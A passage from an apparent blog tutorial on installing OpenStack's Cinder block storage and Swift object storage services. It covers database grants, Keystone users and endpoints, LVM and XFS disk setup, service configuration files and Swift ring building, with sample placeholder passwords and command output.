Query OK, 0 rows affected (0.001 sec)
MariaDB [(none)]> GRANT ALL PRIVILEGES ON cinder.* TO 'cinder'@'%' \
IDENTIFIED BY 'password123';
Query OK, 0 rows affected (0.001 sec)
</code></pre></div></div>
<p>From there, create a user and add it to the service role:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack user create --domain default --password-prompt cinder
User Password:
Repeat User Password:
+---------------------+----------------------------------+
| Field | Value |
+---------------------+----------------------------------+
| domain_id | default |
| enabled | True |
| id | c3829e1a25074642bd1602bfbf2e5ec3 |
| name | cinder |
| options | {} |
| password_expires_at | None |
+---------------------+----------------------------------+
$ openstack role add --project service --user cinder admin
</code></pre></div></div>
<p>Now we can create the service. Note that we are actually going to create two
services, one for Cinder API v2, and one for v3. Not all OpenStack services and
client tools have been updated to fully support newer API versions, and in this
case, we need both versions of the Cinder API to be around.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack service create --name cinderv2 --description "OpenStack Block Storage" volumev2
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | OpenStack Block Storage |
| enabled | True |
| id | e78b48b9847b480ab0f24c1a83d33000 |
| name | cinderv2 |
| type | volumev2 |
+-------------+----------------------------------+
$ openstack service create --name cinderv3 --description "OpenStack Block Storage" volumev3
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | OpenStack Block Storage |
| enabled | True |
| id | 898b8bd404df4c45b44cab44ee8dc16a |
| name | cinderv3 |
| type | volumev3 |
+-------------+----------------------------------+
</code></pre></div></div>
<p>Lets define the two sets of API endpoints:</p>
<p>For v2:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack endpoint create --region RegionOne volumev2 public http://controller:8776/v2/%\(project_id\)s
+--------------+------------------------------------------+
| Field | Value |
+--------------+------------------------------------------+
| enabled | True |
| id | 1d937d8c869c42b2aee7d18362205693 |
| interface | public |
| region | RegionOne |
| region_id | RegionOne |
| service_id | e78b48b9847b480ab0f24c1a83d33000 |
| service_name | cinderv2 |
| service_type | volumev2 |
| url | http://controller:8776/v2/%(project_id)s |
+--------------+------------------------------------------+
$ openstack endpoint create --region RegionOne volumev2 internal http://controller:8776/v2/%\(project_id\)s
+--------------+------------------------------------------+
| Field | Value |
+--------------+------------------------------------------+
| enabled | True |
| id | 005a0f43cd1e45c3bbc5298fdd3ae7ed |
| interface | internal |
| region | RegionOne |
| region_id | RegionOne |
| service_id | e78b48b9847b480ab0f24c1a83d33000 |
| service_name | cinderv2 |
| service_type | volumev2 |
| url | http://controller:8776/v2/%(project_id)s |
+--------------+------------------------------------------+
$ openstack endpoint create --region RegionOne volumev2 admin http://controller:8776/v2/%\(project_id\)s
+--------------+------------------------------------------+
| Field | Value |
+--------------+------------------------------------------+
| enabled | True |
| id | 8a048cac157c4bb094bc529b9d8eede3 |
| interface | admin |
| region | RegionOne |
| region_id | RegionOne |
| service_id | e78b48b9847b480ab0f24c1a83d33000 |
| service_name | cinderv2 |
| service_type | volumev2 |
| url | http://controller:8776/v2/%(project_id)s |
+--------------+------------------------------------------+
</code></pre></div></div>
<p>For v3:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack endpoint create --region RegionOne volumev3 public http://controller:8776/v3/%\(project_id\)s
+--------------+------------------------------------------+
| Field | Value |
+--------------+------------------------------------------+
| enabled | True |
| id | 4d1f8bd850e04220808674a9ad81fd52 |
| interface | public |
| region | RegionOne |
| region_id | RegionOne |
| service_id | 898b8bd404df4c45b44cab44ee8dc16a |
| service_name | cinderv3 |
| service_type | volumev3 |
| url | http://controller:8776/v3/%(project_id)s |
+--------------+------------------------------------------+
$ openstack endpoint create --region RegionOne volumev3 internal http://controller:8776/v3/%\(project_id\)s
+--------------+------------------------------------------+
| Field | Value |
+--------------+------------------------------------------+
| enabled | True |
| id | ca49e233d0fa4ff7b1554d01afbc68ce |
| interface | internal |
| region | RegionOne |
| region_id | RegionOne |
| service_id | 898b8bd404df4c45b44cab44ee8dc16a |
| service_name | cinderv3 |
| service_type | volumev3 |
| url | http://controller:8776/v3/%(project_id)s |
+--------------+------------------------------------------+
$ openstack endpoint create --region RegionOne volumev3 admin http://controller:8776/v3/%\(project_id\)s
+--------------+------------------------------------------+
| Field | Value |
+--------------+------------------------------------------+
| enabled | True |
| id | 3d5ed2a3b6e347a08f8ec79a98f7e95f |
| interface | admin |
| region | RegionOne |
| region_id | RegionOne |
| service_id | 898b8bd404df4c45b44cab44ee8dc16a |
| service_name | cinderv3 |
| service_type | volumev3 |
| url | http://controller:8776/v3/%(project_id)s |
+--------------+------------------------------------------+
</code></pre></div></div>
<h3 id="installing-cinder-to-the-controller">Installing Cinder to the Controller</h3>
<p>Now that the databases and service descriptions have been created we can go
ahead and install some packages:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install cinder-api cinder-scheduler
</code></pre></div></div>
<p>Once that is done, we can do some configuration. Lets add the database creds:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/cinder/cinder.conf
[DEFAULT]
...
transport_url = rabbit://openstack:password123@controller
auth_strategy = keystone
my_ip = 10.0.0.11
[database]
#connection = sqlite:////var/lib/cinder/cinder.sqlite
connection = mysql+pymysql://cinder:password123@controller/cinder
</code></pre></div></div>
<p>Now we can configure Keystone:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[keystone_authtoken]
www_authenticate_uri = http://controller:5000
auth_url = http://controller:5000
memcached_servers = controller:11211
auth_type = password
project_domain_name = default
user_domain_name = default
project_name = service
username = cinder
password = openstack
</code></pre></div></div>
<p>Also configure the lockfile:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[oslo_concurrency]
lock_path = /var/lib/cinder/tmp
</code></pre></div></div>
<p>We can then populate the database with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo -s
# su -s /bin/sh -c "cinder-manage db sync" cinder
</code></pre></div></div>
<p>After that, we need to tell Nova to use Cinder for block storage.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/nova/nova.conf
[cinder]
os_region_name = RegionOne
</code></pre></div></div>
<p>From there, we need to restart the Nova and Cinder services:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart nova-api
$ sudo systemctl restart cinder-scheduler
$ sudo systemctl restart apache2
</code></pre></div></div>
<h3 id="installing-cinder-to-the-block-storage-machine">Installing Cinder to the Block Storage Machine</h3>
<h4 id="set-up-lvm-for-the-cinder-disk">Set Up LVM For the Cinder Disk</h4>
<p>Time to get Cinder installed to our block storage node. We are going to be using
LVM to manage the storage disk, which requires some setup.</p>
<p>Install some LVM tools:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install lvm2 thin-provisioning-tools
</code></pre></div></div>
<p>From there, we need to determine what device to use. Run <code class="language-plaintext highlighter-rouge">lsblk</code> and we see:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ lsblk
vda 252:0 0 10G 0 disk
├─vda1 252:1 0 1M 0 part
└─vda2 252:2 0 10G 0 part /
vdb 252:16 0 10G 0 disk
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">/dev/vda</code> is the disk the operating system is installed on, since we have a 1Mb
boot partition, and a 10gb disk. This means <code class="language-plaintext highlighter-rouge">/dev/vdb</code> is the disk we will
prepare for use with Cinder.</p>
<p>We need to create a LVM physical volume and a volume group on the disk:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo pvcreate /dev/vdb
Physical volume "/dev/vdb" successfully created.
$ sudo vgcreate cinder-volumes /dev/vdb
Volume group "cinder-volumes" successfully created
</code></pre></div></div>
<p>Now, we also need to edit the LVM configuration file. LVM will automatically scan
block storage devices in <code class="language-plaintext highlighter-rouge">/dev</code> to see if they contain volumes, and this can
cause some trouble when it detects the many volumes Cinder will be making. So,
we will change LVMs behaviour from exploring all block devices for volumes, to
only scan <code class="language-plaintext highlighter-rouge">/dev/vdb</code> and not to go deeper, by adding a filter.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/lvm/lvm.conf
devices {
...
filter = [ "a/vdb/", "r/.*/"]
</code></pre></div></div>
<h4 id="install-and-configure-the-cinder-service">Install and Configure the Cinder Service</h4>
<p>Now we can install the Cinder packages:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install cinder-volume
</code></pre></div></div>
<p>Lets edit some configuration, and add some DB creds:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/cinder/cinder.conf
[DEFAULT]
...
transport_url = rabbit://openstack:password123@controller
auth_strategy = keystone
my_ip = 10.0.0.31
enabled_backends = lvm
glance_api_servers = http://controller:9292
[database]
#connection = sqlite:////var/lib/cinder/cinder.sqlite
connection = mysql+pymysql://cinder:password123@controller/cinder
</code></pre></div></div>
<p>Lets set up Keystone:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[keystone_authtoken]
www_authenticate_uri = http://controller:5000
auth_url = http://controller:5000
memcached_servers = controller:11211
auth_type = password
project_domain_name = default
user_domain_name = default
project_name = service
username = cinder
password = openstack
</code></pre></div></div>
<p>We need to configure some LVM settings:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[lvm]
volume_driver = cinder.volume.drivers.lvm.LVMVolumeDriver
volume_group = cinder-volumes
target_protocol = iscsi
target_helper = tgtadm
</code></pre></div></div>
<p>What this does is configure Cinder to pass block storage volumes to the instances
we make over iscsi. This is how we get away with not having the disks physically
connected to the instances, and being on a different host to the compute host.</p>
<p>And we need to set a lockfile path:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[oslo_concurrency]
lock_path = /var/lib/cinder/tmp
</code></pre></div></div>
<p>The last thing we need to do is restart some services:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart tgt
$ sudo systemctl restart cinder-volume
</code></pre></div></div>
<h3 id="verifying-that-cinder-was-installed-correctly">Verifying that Cinder was Installed Correctly</h3>
<p>Head back to the controller, source the admin creds, and list all volume services:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ . admin-openrc
$ openstack volume service list
+------------------+-------------------+------+---------+-------+----------------------------+
| Binary | Host | Zone | Status | State | Updated At |
+------------------+-------------------+------+---------+-------+----------------------------+
| cinder-scheduler | controller | nova | enabled | up | 2020-01-31T02:42:17.000000 |
| cinder-volume | block-storage@lvm | nova | enabled | up | 2020-01-31T02:42:20.000000 |
+------------------+-------------------+------+---------+-------+----------------------------+
</code></pre></div></div>
<p>We see cinder-scheduler running on the controller, and cinder-volume running
on the block storage machine, with both services alive. I think we are done
setting up Cinder.</p>
<h2 id="installing-swift-the-object-storage-service">Installing Swift, the Object Storage Service</h2>
<p>Swift is the object storage service for OpenStack. Swift takes in objects of
any size and replicates them across a storage cluster. Swift uses a eventual
consistency model, as opposed to Ceph, which uses strong consistency model.
This means an object you get from Swift may or may not be the latest version
of that object.</p>
<p>Swift is fast and robust, and we will be integrating it into this cluster.</p>
<p>I’m going to be following the <a href="https://docs.openstack.org/swift/train/install/index.html">Installation Documentation</a>.</p>
<h3 id="creating-users-and-set-up-services-and-endpoints">Creating Users and Set Up Services and Endpoints</h3>
<p>Swift uses sqlite databases on the object storage nodes, so we do not need to
add any database entries. So, we can get right to making users.</p>
<p>SSH into the controller, source the admin creds, and make a swift user.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ . admin-openrc
$ openstack user create --domain default --password-prompt swift
User Password:
Repeat User Password:
+---------------------+----------------------------------+
| Field | Value |
+---------------------+----------------------------------+
| domain_id | default |
| enabled | True |
| id | 4f74761ec0b74087b91eb8431388b174 |
| name | swift |
| options | {} |
| password_expires_at | None |
+---------------------+----------------------------------+
$ openstack role add --project service --user swift admin
</code></pre></div></div>
<p>Now we can make the Swift service:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack service create --name swift \
--description "OpenStack Object Storage" object-store
+-------------+----------------------------------+
| Field | Value |
+-------------+----------------------------------+
| description | OpenStack Object Storage |
| enabled | True |
| id | aa1bb7fe0ffb4144b295ac0d752a6933 |
| name | swift |
| type | object-store |
+-------------+----------------------------------+
</code></pre></div></div>
<p>And the endpoints:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack endpoint create --region RegionOne \
> object-store public http://controller:8080/v1/AUTH_%\(project_id\)s
+--------------+-----------------------------------------------+
| Field | Value |
+--------------+-----------------------------------------------+
| enabled | True |
| id | d25b1f10c3f14fc98fd87a8b17fb405d |
| interface | public |
| region | RegionOne |
| region_id | RegionOne |
| service_id | aa1bb7fe0ffb4144b295ac0d752a6933 |
| service_name | swift |
| service_type | object-store |
| url | http://controller:8080/v1/AUTH_%(project_id)s |
+--------------+-----------------------------------------------+
$ openstack endpoint create --region RegionOne \
object-store internal http://controller:8080/v1/AUTH_%\(project_id\)s
+--------------+-----------------------------------------------+
| Field | Value |
+--------------+-----------------------------------------------+
| enabled | True |
| id | 4289f12ec58a46669092f3645ca48d26 |
| interface | internal |
| region | RegionOne |
| region_id | RegionOne |
| service_id | aa1bb7fe0ffb4144b295ac0d752a6933 |
| service_name | swift |
| service_type | object-store |
| url | http://controller:8080/v1/AUTH_%(project_id)s |
+--------------+-----------------------------------------------+
$ openstack endpoint create --region RegionOne \
object-store admin http://controller:8080/v1
+--------------+----------------------------------+
| Field | Value |
+--------------+----------------------------------+
| enabled | True |
| id | 9c6a6d0a1d784da49c53d92f3387285d |
| interface | admin |
| region | RegionOne |
| region_id | RegionOne |
| service_id | aa1bb7fe0ffb4144b295ac0d752a6933 |
| service_name | swift |
| service_type | object-store |
| url | http://controller:8080/v1 |
+--------------+----------------------------------+
</code></pre></div></div>
<h3 id="installing-swift-to-the-controller">Installing Swift to the Controller</h3>
<p>Let’s install some packages and configure them.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install swift swift-proxy python3-swiftclient
</code></pre></div></div>
<p>From there, we will need to manually create some directories and files:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo mkdir /etc/swift
$ sudo curl -o /etc/swift/proxy-server.conf https://opendev.org/openstack/swift/raw/branch/master/etc/proxy-server.conf-sample
</code></pre></div></div>
<p>Time to edit the configuration:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/swift/proxy-server.conf
[DEFAULT]
bind_ip = 10.0.0.11
bind_port = 8080
# keep_idle = 600
# bind_timeout = 30
# backlog = 4096
swift_dir = /etc/swift
user = swift
</code></pre></div></div>
<p>In the <code class="language-plaintext highlighter-rouge">[pipeline:main]</code> section, remove <code class="language-plaintext highlighter-rouge">tempurl</code> and <code class="language-plaintext highlighter-rouge">tempauth</code>, and replace
with <code class="language-plaintext highlighter-rouge">authtoken</code> and <code class="language-plaintext highlighter-rouge">keystoneauth</code> like so:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[pipeline:main]
pipeline = catch_errors gatekeeper healthcheck proxy-logging cache listing_formats container_sync bulk ratelimit authtoken keystoneauth copy container-quotas account-quotas slo dlo versioned_writes symlink proxy-logging proxy-server
</code></pre></div></div>
<p>Back to it:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[app:proxy-server]
use = egg:swift#proxy
account_autocreate = True
[filter:keystoneauth]
use = egg:swift#keystoneauth
operator_roles = admin,user
</code></pre></div></div>
<p>Let’s set up keystone:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[filter:authtoken]
paste.filter_factory = keystonemiddleware.auth_token:filter_factory
www_authenticate_uri = http://controller:5000
auth_url = http://controller:5000
memcached_servers = controller:11211
auth_type = password
project_domain_id = default
user_domain_id = default
project_name = service
username = swift
password = openstack
delay_auth_decision = True
</code></pre></div></div>
<p>Finally, a small config change for memcached:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[filter:cache]
use = egg:swift#memcache
memcache_servers = controller:11211
</code></pre></div></div>
<h3 id="setting-up-disks-on-each-of-the-object-storage-machines">Setting Up Disks on Each of the Object Storage Machines</h3>
<p>The next set of steps we need to do on both of the Object Storage nodes.</p>
<p>Install some packages:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install xfsprogs rsync
</code></pre></div></div>
<p>We now need to determine what drives we have, so run <code class="language-plaintext highlighter-rouge">lsblk</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>vda 252:0 0 10G 0 disk
├─vda1 252:1 0 1M 0 part
└─vda2 252:2 0 10G 0 part /
vdb 252:16 0 10G 0 disk
vdc 252:32 0 10G 0 disk
</code></pre></div></div>
<p>We see that <code class="language-plaintext highlighter-rouge">vdb</code> and <code class="language-plaintext highlighter-rouge">vdc</code> are our disks. Lets format with them XFS:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo mkfs.xfs /dev/vdb
$ sudo mkfs.xfs /dev/vdc
</code></pre></div></div>
<p>From there, we will set up persistent mountpoints under <code class="language-plaintext highlighter-rouge">/srv</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo mkdir -p /srv/node/vdb
$ sudo mkdir -p /srv/node/vdc
</code></pre></div></div>
<p>Next, edit <code class="language-plaintext highlighter-rouge">fstab</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/fstab
/dev/vdb /srv/node/vdb xfs noatime,nodiratime,logbufs=8 0 2
/dev/vdc /srv/node/vdc xfs noatime,nodiratime,logbufs=8 0 2
</code></pre></div></div>
<p>Mount the drives:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo mount /srv/node/vdb
$ sudo mount /srv/node/vdc
</code></pre></div></div>
<p>Time to set up rsync:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo vim /etc/rsyncd.conf
uid = swift
gid = swift
log file = /var/log/rsyncd.log
pid file = /var/run/rsyncd.pid
address = 10.0.0.41
[account]
max connections = 2
path = /srv/node/
read only = False
lock file = /var/lock/account.lock
[container]
max connections = 2
path = /srv/node/
read only = False
lock file = /var/lock/container.lock
[object]
max connections = 2
path = /srv/node/
read only = False
lock file = /var/lock/object.lock
</code></pre></div></div>
<p>Make sure the IP address is correct for the machine you are editing it on.</p>
<p>Enable rsync with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/default/rsync
RSYNC_ENABLE=true
</code></pre></div></div>
<p>Restart rsync with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo systemctl restart rsync
</code></pre></div></div>
<h3 id="installing-swift-to-the-object-storage-machines">Installing Swift to the Object Storage Machines</h3>
<p>Time to install and configure Swift on our object storage nodes. We need to
do the following on each of our nodes.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install swift swift-account swift-container swift-object
</code></pre></div></div>
<p>From there, we need to edit our configuration files. We need to download them
first:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo curl -o /etc/swift/account-server.conf https://opendev.org/openstack/swift/raw/branch/master/etc/account-server.conf-sample
$ sudo curl -o /etc/swift/container-server.conf https://opendev.org/openstack/swift/raw/branch/master/etc/container-server.conf-sample
$ sudo curl -o /etc/swift/object-server.conf https://opendev.org/openstack/swift/raw/branch/master/etc/object-server.conf-sample
</code></pre></div></div>
<p>Lets edit our config, starting with <code class="language-plaintext highlighter-rouge">account-server.conf</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/swift/account-server.conf
[DEFAULT]
bind_ip = 10.0.0.41
bind_port = 6202
user = swift
swift_dir = /etc/swift
devices = /srv/node
mount_check = true
[pipeline:main]
pipeline = healthcheck recon account-server
[filter:recon]
use = egg:swift#recon
recon_cache_path = /var/cache/swift
</code></pre></div></div>
<p>Make sure you use the correct IP address for your object storage node.</p>
<p>Onto <code class="language-plaintext highlighter-rouge">container-server.conf</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/swift/container-server.conf
[DEFAULT]
bind_ip = 10.0.0.41
bind_port = 6201
user = swift
swift_dir = /etc/swift
devices = /srv/node
mount_check = true
[pipeline:main]
pipeline = healthcheck recon container-server
[filter:recon]
use = egg:swift#recon
recon_cache_path = /var/cache/swift
</code></pre></div></div>
<p>Finally, <code class="language-plaintext highlighter-rouge">object-server.conf</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo vim /etc/swift/object-server.conf
[DEFAULT]
bind_ip = 10.0.0.41
bind_port = 6200
user = swift
swift_dir = /etc/swift
devices = /srv/node
mount_check = true
[pipeline:main]
pipeline = healthcheck recon object-server
[filter:recon]
use = egg:swift#recon
recon_cache_path = /var/cache/swift
recon_lock_path = /var/lock
</code></pre></div></div>
<p>We then need to ensure some directories exist and the swift user has access to
it:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo chown -R swift:swift /srv/node
$ sudo mkdir -p /var/cache/swift
$ sudo chown -R root:swift /var/cache/swift
$ sudo chmod -R 775 /var/cache/swift
</code></pre></div></div>
<h3 id="creating-and-deploying-starting-swift-rings">Creating and Deploying Starting Swift Rings</h3>
<p>Swift has three main parts of its storage architecture, and it was hinted at in
the previous section. Swift has the idea of “rings” to separate concerns within
its architecture. There is the account ring, the container ring and the object
ring.</p>
<p>We need to configure the different rings on the controller, and then take the
configuration generated and give it to all the object storage nodes.</p>
<p>So SSH into the controller, and let’s make some rings:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ cd /etc/swift
</code></pre></div></div>
<p>The account ring initial config sits in the <code class="language-plaintext highlighter-rouge">account.builder</code> file, which we will
create:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo swift-ring-builder account.builder create 10 3 1
</code></pre></div></div>
<p>Then we can add our rings. We need to add both object storage nodes, and
both of their disks.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo swift-ring-builder account.builder add \
--region 1 --zone 1 --ip 10.0.0.41 --port 6202 --device vdb --weight 100
Device d0r1z1-10.0.0.41:6202R10.0.0.41:6202/vdb_"" with 100.0 weight got id 0
$ sudo swift-ring-builder account.builder add \
--region 1 --zone 1 --ip 10.0.0.41 --port 6202 --device vdc --weight 100
Device d1r1z1-10.0.0.41:6202R10.0.0.41:6202/vdc_"" with 100.0 weight got id 1
$
$ sudo swift-ring-builder account.builder add \
--region 1 --zone 1 --ip 10.0.0.51 --port 6202 --device vdb --weight 100
Device d2r1z1-10.0.0.51:6202R10.0.0.51:6202/vdb_"" with 100.0 weight got id 2
$ sudo swift-ring-builder account.builder add \
--region 1 --zone 1 --ip 10.0.0.51 --port 6202 --device vdc --weight 100
Device d3r1z1-10.0.0.51:6202R10.0.0.51:6202/vdc_"" with 100.0 weight got id 3
</code></pre></div></div>
<p>From there, we can examine the ring contents with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo swift-ring-builder account.builder
account.builder, build version 4, id c77e5777355547608a121a2949a175dc
1024 partitions, 3.000000 replicas, 1 regions, 1 zones, 4 devices, 100.00 balance, 0.00 dispersion
The minimum number of hours before a partition can be reassigned is 1 (0:00:00 remaining)
The overload factor is 0.00% (0.000000)
Ring file account.ring.gz not found, probably it hasn't been written yet
Devices: id region zone ip address:port replication ip:port name weight partitions balance flags meta
0 1 1 10.0.0.41:6202 10.0.0.41:6202 vdb 100.00 0 -100.00
1 1 1 10.0.0.41:6202 10.0.0.41:6202 vdc 100.00 0 -100.00
2 1 1 10.0.0.51:6202 10.0.0.51:6202 vdb 100.00 0 -100.00
3 1 1 10.0.0.51:6202 10.0.0.51:6202 vdc 100.00 0 -100.00
</code></pre></div></div>
<p>We can rebalance the account ring with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo swift-ring-builder account.builder rebalance
Reassigned 3072 (300.00%) partitions. Balance is now 0.00. Dispersion is now 0.00
</code></pre></div></div>
<p>Next up is the container ring. Let’s make the <code class="language-plaintext highlighter-rouge">container.builder</code> file:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo swift-ring-builder container.builder create 10 3 1
</code></pre></div></div>
<p>We can add our rings with the below, taking care to include each node and each
disk:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo swift-ring-builder container.builder add \
--region 1 --zone 1 --ip 10.0.0.41 --port 6201 --device vdb --weight 100
Device d0r1z1-10.0.0.41:6201R10.0.0.41:6201/vdb_"" with 100.0 weight got id 0
$ sudo swift-ring-builder container.builder add \
--region 1 --zone 1 --ip 10.0.0.41 --port 6201 --device vdc --weight 100
Device d1r1z1-10.0.0.41:6201R10.0.0.41:6201/vdc_"" with 100.0 weight got id 1
$
$ sudo swift-ring-builder container.builder add \
--region 1 --zone 1 --ip 10.0.0.51 --port 6201 --device vdb --weight 100
Device d2r1z1-10.0.0.51:6201R10.0.0.51:6201/vdb_"" with 100.0 weight got id 2
$ sudo swift-ring-builder container.builder add \
--region 1 --zone 1 --ip 10.0.0.51 --port 6201 --device vdc --weight 100
Device d3r1z1-10.0.0.51:6201R10.0.0.51:6201/vdc_"" with 100.0 weight got id 3
</code></pre></div></div>
<p>Again, we can view the contents with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo swift-ring-builder container.builder
container.builder, build version 4, id ac293f6e2e2248798e213382f4b9f60e
1024 partitions, 3.000000 replicas, 1 regions, 1 zones, 4 devices, 100.00 balance, 0.00 dispersion
The minimum number of hours before a partition can be reassigned is 1 (0:00:00 remaining)
The overload factor is 0.00% (0.000000)
Ring file container.ring.gz not found, probably it hasn't been written yet
Devices: id region zone ip address:port replication ip:port name weight partitions balance flags meta
0 1 1 10.0.0.41:6201 10.0.0.41:6201 vdb 100.00 0 -100.00
1 1 1 10.0.0.41:6201 10.0.0.41:6201 vdc 100.00 0 -100.00
2 1 1 10.0.0.51:6201 10.0.0.51:6201 vdb 100.00 0 -100.00
3 1 1 10.0.0.51:6201 10.0.0.51:6201 vdc 100.00 0 -100.00
</code></pre></div></div>
<p>We can rebalance the ring with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo swift-ring-builder container.builder rebalance
Reassigned 3072 (300.00%) partitions. Balance is now 0.00. Dispersion is now 0.00
</code></pre></div></div>
<p>Next up is the object ring:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo swift-ring-builder object.builder create 10 3 1
</code></pre></div></div>
<p>We can add the nodes to the ring with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo swift-ring-builder object.builder add \
--region 1 --zone 1 --ip 10.0.0.41 --port 6200 --device vdb --weight 100
Device d0r1z1-10.0.0.41:6200R10.0.0.41:6200/vdb_"" with 100.0 weight got id 0
$ sudo swift-ring-builder object.builder add \
--region 1 --zone 1 --ip 10.0.0.41 --port 6200 --device vdc --weight 100
Device d1r1z1-10.0.0.41:6200R10.0.0.41:6200/vdc_"" with 100.0 weight got id 1
$
$ sudo swift-ring-builder object.builder add \
--region 1 --zone 1 --ip 10.0.0.51 --port 6200 --device vdb --weight 100
Device d2r1z1-10.0.0.51:6200R10.0.0.51:6200/vdb_"" with 100.0 weight got id 2
$ sudo swift-ring-builder object.builder add \
--region 1 --zone 1 --ip 10.0.0.51 --port 6200 --device vdc --weight 100
Device d3r1z1-10.0.0.51:6200R10.0.0.51:6200/vdc_"" with 100.0 weight got id 3
</code></pre></div></div>
<p>We can view the contents of the ring with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo swift-ring-builder object.builder
object.builder, build version 4, id 092ad11e9c4d4939a6a4a6acf110cea0
1024 partitions, 3.000000 replicas, 1 regions, 1 zones, 4 devices, 100.00 balance, 0.00 dispersion
The minimum number of hours before a partition can be reassigned is 1 (0:00:00 remaining)
The overload factor is 0.00% (0.000000)
Ring file object.ring.gz not found, probably it hasn't been written yet
Devices: id region zone ip address:port replication ip:port name weight partitions balance flags meta
0 1 1 10.0.0.41:6200 10.0.0.41:6200 vdb 100.00 0 -100.00
1 1 1 10.0.0.41:6200 10.0.0.41:6200 vdc 100.00 0 -100.00
2 1 1 10.0.0.51:6200 10.0.0.51:6200 vdb 100.00 0 -100.00
3 1 1 10.0.0.51:6200 10.0.0.51:6200 vdc 100.00 0 -100.00
</code></pre></div></div>
